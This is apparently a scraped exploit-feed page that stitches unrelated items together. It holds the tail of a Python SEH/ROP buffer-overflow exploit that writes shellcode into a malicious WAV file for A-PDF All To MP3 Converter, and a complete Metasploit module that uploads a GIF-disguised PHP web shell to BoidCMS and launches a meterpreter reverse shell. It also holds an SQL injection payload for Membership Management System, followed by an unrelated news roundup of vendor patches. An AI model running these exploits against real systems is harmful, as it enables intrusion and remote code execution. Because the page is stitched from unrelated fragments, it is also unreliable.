RETN [Module : Alltomp3.exe]  ** Null byte **ROP += b"A" * 8 ROP += struct.pack("<I", 0x1003176D) # 0x1003176D          # MOV EAX,EDI # POP ESI # RETN [Module : lame_enc.dll]  ** ROP += b"A" * 4ROP += struct.pack("<I", 0x1002fc2a) # 0x1002fc2a: pop edi ; ret  ;  (1 found)ROP += struct.pack("<I", 0x000000a0)ROP += struct.pack("<I", 0x10035015) # 0x10035015: add eax, edi ; pop edi ; pop esi ; pop ebx ; pop ebp ; ret  ;  (1 found)ROP += struct.pack("<I", 0x41414141)*4ROP += struct.pack("<I", 0x1003303A) # 0x1003303A  # MOV DWORD PTR DS:[ECX],EAX # RETN   [Module : lame_enc.dll]  ** ROP += struct.pack("<I", 0x10020004) # 0x10020004: xchg eax, ebp ; ret  ;  (1 found)#######################    15. GOTO _memcpy_s                        ###########################ROP += struct.pack("<I", 0x0042C7CB)  # 0x0042C7CB      # PUSH ESP # POP EDI # POP ESI # POP EBX # RETN [Module : Alltomp3.exe]  ** Null byte **ROP += b"A" * 8 ROP += struct.pack("<I", 0x1003176D) # 0x1003176D          # MOV EAX,EDI # POP ESI # RETN [Module : lame_enc.dll]  ** ROP += b"A" * 4ROP += struct.pack("<I", 0x1002fc2a) # 0x1002fc2a: pop edi ; ret  ;  (1 found)ROP += struct.pack("<I", 0xfffffc94)ROP += struct.pack("<I", 0x10035015) # 0x10035015: add eax, edi ; pop edi ; pop esi ; pop ebx ; pop ebp ; ret  ;  (1 found)ROP += struct.pack("<I", 0x41414141)*4ROP += struct.pack("<I", 0x005f5548) # 0x005f5548: xchg eax, esp ; ret  ;  (1 found)#######################  SHELLCODE  ###########################shellcode = b"\xcc" * 400real_shellcode = b"\x33\xc9\x64\x8b\x49\x30\x8b\x49\x0c\x8b"real_shellcode += b"\x49\x1c\x8b\x59\x08\x8b\x41\x20\x8b\x09"real_shellcode += b"\x80\x78\x0c\x33\x75\xf2\x8b\xeb\x03\x6d"real_shellcode += b"\x3c\x8b\x6d\x78\x03\xeb\x8b\x45\x20\x03"real_shellcode += b"\xc3\x33\xd2\x8b\x34\x90\x03\xf3\x42\x81"real_shellcode += b"\x3e\x47\x65\x74\x50\x75\xf2\x81\x7e\x04"real_shellcode += b"\x72\x6f\x63\x41\x75\xe9\x8b\x75\x24\x03"real_shellcode += b"\xf3\x66\x8b\x14\x56\x8b\x75\x1c\x03\xf3"real_shellcode += b"\x8b\x74\x96\xfc\x03\xf3\x33\xff\x57\x68"real_shellcode += b"\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68"real_shellcode += b"\x4c\x6f\x61\x64\x54\x53\xff\xd6\x33\xc9"real_shellcode += b"\x57\x66\xb9\x33\x32\x51\x68\x75\x73\x65"real_shellcode += b"\x72\x54\xff\xd0\x57\x68\x6f\x78\x41\x01"real_shellcode += b"\xfe\x4c\x24\x03\x68\x61\x67\x65\x42\x68"real_shellcode += b"\x4d\x65\x73\x73\x54\x50\xff\xd6\x57\x68"real_shellcode += b"\x72\x6c\x64\x21\x68\x6f\x20\x57\x6f\x68"real_shellcode += b"\x48\x65\x6c\x6c\x8b\xcc\x57\x57\x51\x57"real_shellcode += b"\xff\xd0\x57\x68\x65\x73\x73\x01\xfe\x4c"real_shellcode += b"\x24\x03\x68\x50\x72\x6f\x63\x68\x45\x78"real_shellcode += b"\x69\x74\x54\x53\xff\xd6\x57\xff\xd0"#######################  CONSTRUCT  ###########################SIZE = 500start_of_padding = b"A" * (SIZE-len(EXE)-len(shellcode))start_of_padding += shellcodestart_of_padding += EXESIZE = 1500RET_NOP_TO_ROP = b"A" * 0x70 + struct.pack("I", 0x1003c6aa) * 10 # RET#INT = struct.pack("I", 0x1000f2b3) + b"BBBB" # 0x1000f2b3: int3  ; pop esi ; ret  ;  (1 found)INT = struct.pack("I", 0x1003c6aa)*2rest_of_payload = RET_NOP_TO_ROP + INT + ROP # 160 + 14*4 + 172rest_of_payload += b"\x90" * 100rest_of_payload += real_shellcoderest_of_payload += b"\x90" * (SIZE-len(rest_of_payload))payload = junk + SEH + start_of_padding + rest_of_payloadREST = b"\x44" * (size-len(payload))payload += RESTfile = open("1.wav", "wb")file.write(payload)file.close()

A-PDF All To MP3 Converter 2.0.0 Overflow

This Metasploit module leverages CVE-2023-38836, an improper sanitization bug in BoidCMS versions 2.0.0 and below. BoidCMS allows the authenticated upload of a php file as media if the file has the GIF header, even if the file is a php file.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework###class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::FileDropper  prepend Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'BoidCMS Command Injection',        'Description' => %q{          This module leverages CVE-2023-38836, an improper sanitization bug in BoidCMS version 2.0.0          and below.  BoidCMS allows the authenticated upload of a php file as media if the file has          the GIF header, even if the file is a php file.        },        'License' => MSF_LICENSE,        'Author' => [          '1337kid',    # Discovery          'bwatters-r7' # Metasploit Module        ],        'References' => [          [ 'CVE', '2023-38836' ],          [ 'URL', 'https://github.com/1337kid/CVE-2023-38836']        ],        'Privileged' => false,        'Arch' => ARCH_CMD,        'Targets' => [          [            'nix Command',            {              'Platform' => ['linux', 'unix', 'python'],              'DefaultOptions' => {                'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp',                'FETCH_COMMAND' => 'WGET',                'FETCH_WRITABLE_DIR' => '/tmp'              }            }          ],          [            'Windows Command',            {              'Platform' => ['windows', 'python'],              'DefaultOptions' => {                'PAYLOAD' => 'cmd/windows/http/x64/meterpreter_reverse_tcp',                'FETCH_WRITABLE_DIR' => '%TEMP%',                'FETCH_COMMAND' => 'CURL'              }            }          ]        ],        'DefaultTarget' => 0,        'DisclosureDate' => '2023-07-13',        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]        }      )    )    register_options([      OptString.new('TARGETURI', [true, 'The path', '']),      OptString.new('CMS_USERNAME', [true, 'Username', 'admin']),      OptString.new('CMS_PASSWORD', [true, 'Password', 'password']),      OptString.new('PHP_FILENAME', [true, 'The name for the php file to upload', "#{Rex::Text.rand_text_alphanumeric(5..11)}.php"])    ])    @token = nil    @shell_filename = nil  end  def check    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path, 'admin'),      'keep_cookies' => true,      'method' => 'GET'    )    if res && res.code == 200      title = res.get_html_document.xpath('//title').first.to_s      return Exploit::CheckCode::Detected('Detected BoidCMS, but the version is unknown.') if title.include?('BoidCMS')    end    return Exploit::CheckCode::Safe('Unable to retrieve BoidCMS title page')  end  def extract_token(res)    token = nil    if res && res.code == 200      token = res.get_html_document.xpath("//input[@name='token']/@value").first    end    token  end  def cms_token    # initial login    return @token unless @token.nil?    vprint_status('Getting Token')    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path, 'admin'),      'keep_cookies' => true,      'method' => 'GET'    )    @token = extract_token(res)  end  def cms_login?(login_token)    vprint_status('Logging into CMS')    cms_password = datastore['CMS_PASSWORD']    cms_username = datastore['CMS_USERNAME']    vars_form_data =      [        {          'name' => 'username',          'data' => cms_username        },        {          'name' => 'password',          'data' => cms_password        },        {          'name' => 'login',          'data' => 'Login'        },        {          'name' => 'token',          'data' => login_token.to_s        }      ]    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path, 'admin'),      'method' => 'POST',      'keep_cookies' => true,      'vars_form_data' => vars_form_data    )    res && res.code == 302  end  def upload_php?(login_token, shell_filename)    vprint_status("Uploading PHP file #{shell_filename}")    vars_form_data =      [        {          'name' => 'file',          'data' => 'GIF89a;\n<?php system($_GET["cmd"]) ?>',          'filename' => shell_filename        },        {          'name' => 'token',          'data' => login_token.to_s        },        {          'name' => 'upload',          'data' => 'Upload'        }      ]    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path, 'admin'),      'method' => 'POST',      'keep_cookies' => true,      'vars_get' => {        'page' => 'media'      },      'vars_form_data' => vars_form_data    )    res && res.code == 302  end  def launch_payload(shell_filename, payload_cmd)    # send the command to the php page    vprint_status('launching Payload')    send_request_cgi(      'uri' => normalize_uri(target_uri.path, "/media/#{shell_filename}"),      'method' => 'GET',      'keep_cookies' => true,      'vars_get' =>        {          'cmd' => payload_cmd        }    )  end  def exploit    @shell_filename = datastore['PHP_FILENAME']    login_token = cms_token    fail_with(Failure::UnexpectedReply, 'Failed to retrieve token for login') if login_token.nil?    fail_with(Failure::UnexpectedReply, 'Failed to log in') unless cms_login?(login_token)    if upload_php?(login_token, @shell_filename)      register_file_for_cleanup @shell_filename      launch_payload(@shell_filename, payload.encoded)    else      fail_with(Failure::UnexpectedReply, 'Failed to upload php files')    end  endend

BoidCMS 2.0.0 Command Injection

Membership Management System version 1.0 suffers from a remote SQL injection vulnerability.

    - Title: Membership Management System - SQL injection- Application: Hospital Management System- Date: 01.03.2024- Bugs: SQL injection- Exploit Author: SoSPiro- Vendor Homepage: https://codeastro.com/author/nbadmin/- Software Link: https://codeastro.com/membership-management-system-in-php-with-source-code/- Version: 1.0- Tested on: Windows 10 64 bit Wampserver### Vulnerability Description:The provided payload in the POST request indicates a potential SQL injection vulnerability. Specifically, the manipulation within the email and password parameters suggests an attempt to influence the SQL query directly, presenting a risk for exploiting security vulnerabilities.### SQL Injection:This manipulated submission aims to affect the SQL query by incorporating user input. For instance, the use of **sleep(5)** introduces a time-delay technique, indicative of a potential resource-consuming attack vector by malevolent actors.### Proof of Concept (PoC):Below is an example payload illustrating the SQL injection vulnerability:```email=test@123.asd' + (SELECT * FROM (SELECT (SLEEP(5)))a) +'&password=admin' or '1'='1'&login=```In this example, the **sleep(5)** function is employed to induce a time delay, followed by the use of or **'1'='1'** in the password control section, aiming to always evaluate as true.- Request Response[PoC FoTo](https://gcdnb.pbrd.co/images/9k8xy4YRomp3.png?o=1)### Vulnerable Code Section:```php$email = $_POST['email'];$password = $_POST['password'];$hashed_password = md5($password);$sql = "SELECT * FROM users WHERE email = '$email' AND password = '$hashed_password'";```The provided PHP code section exacerbates the SQL injection risk by directly incorporating user input into the SQL query. To mitigate this vulnerability, the use of parameterized queries or prepared statements is recommended.## Reproduce: https://sospiro014.github.io/Membership-Management-System-SQL-injection

Membership Management System 1.0 SQL Injection

Plus: Mozilla patches 12 flaws in Firefox, Zoom fixes seven vulnerabilities, and more critical updates from February.

CVE-2024-1553 and CVE-2024-1557 are memory-safety bugs rated as having a high severity. “Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code,” Mozilla researchers said.

Zoom

Video conferencing giant Zoom has issued fixes for seven flaws in its software, one of which has a CVSS score of 9.6. CVE-2024-24691 is an improper-input-validation bug in Zoom Desktop Client for Windows, Zoom VDI Client for Windows, and Zoom Meeting SDK for Windows. If exploited, the issue may allow an unauthenticated attacker to escalate their privileges via network access, Zoom said in a security bulletin.

Another notable flaw is CVE-2024-24697, an untrusted-search-path issue in some Zoom 32 bit Windows clients that could allow an authenticated user with local access to escalate their privileges.

Ivanti

In January, Ivanti warned that attackers were targeting two unpatched vulnerabilities in its Connect Secure and Policy Secure products, tracked as CVE-2023-46805 and CVE-2024-21887. With a CVSS score of 8.2 the first authentication-bypass vulnerability in the web component of Ivanti Connect Secure and Ivanti Policy Secure allows a remote attacker to access restricted resources by bypassing control checks.

With a CVSS score of 9.1, the second command injection vulnerability in web components of Ivanti Connect Secure and Ivanti Policy Secure allows an authenticated administrator to send specially crafted requests and execute arbitrary commands on the appliance. This vulnerability can be exploited over the internet.

At the end of the month, the firm alerted companies to another two serious flaws, one of which was being exploited in attacks. The exploited issue is a server-side request forgery bug in the SAML component tracked as CVE-2024-21893. Meanwhile, CVE-2024-21888 is a privilege-escalation vulnerability.

Patches were available by February 1, but the issues were deemed so serious that the US Cybersecurity and Infrastructure Security Agency (CISA) advised disconnecting all Ivanti products by February 2.

On February 8, Ivanti released a patch for yet another issue tracked as CVE-2024-22024, which prompted another CISA warning.

Fortinet

Fortinet has issued a patch for a critical issue with a CVSS score of 9.6, which it says is already being used in attacks. Tracked as CVE-2024-21762, the code-execution flaw impacts FortiOS versions 6.0, 6.2, 6.4, 7.0, 7.2 and 7.4. The out-of-bounds write vulnerability can be used for arbitrary code execution using specially crafted HTTP requests, Fortinet said.

It came just days after the firm released a patch for two issues in its FortiSIEM products, CVE-2024-23108 and CVE-2024-23109, rated as critical with a CVSS score of 9.7. The flaw in FortiSIEM Supervisor could allow a remote unauthenticated attacker to execute unauthorized commands via crafted API requests, Fortinet said in an advisory.

Cisco

Cisco has listed multiple vulnerabilities in its Expressway Series that could allow an unauthenticated, remote attacker to conduct cross-site request forgery attacks.

Tracked as CVE-2024-20252 and CVE-2024-20254, two vulnerabilities in the API of Cisco Expressway Series devices have been given a CVSS score of 9.6. “An attacker could exploit these vulnerabilities by persuading a user of the API to follow a crafted link,” Cisco said. “A successful exploit could allow the attacker to perform arbitrary actions with the privilege level of the affected user.”

SAP

Enterprise software firm SAP has released 13 security updates as part of its SAP Security Patch Day. CVE-2024-22131 is a code-injection vulnerability in SAP ABA with a CVSS score of 9.1.

CVE-2024-22126 is a cross-site scripting vulnerability in NetWeaver AS Java listed as having a high impact, with a CVSS score of 8.8. “Incoming URL parameters are insufficiently validated and improperly encoded before including them into redirect URLs,” security firm Onapsis said. “This can result in a cross-site scripting vulnerability, leading to a high impact on confidentiality and mild impact on integrity and availability.”

Tag

#windows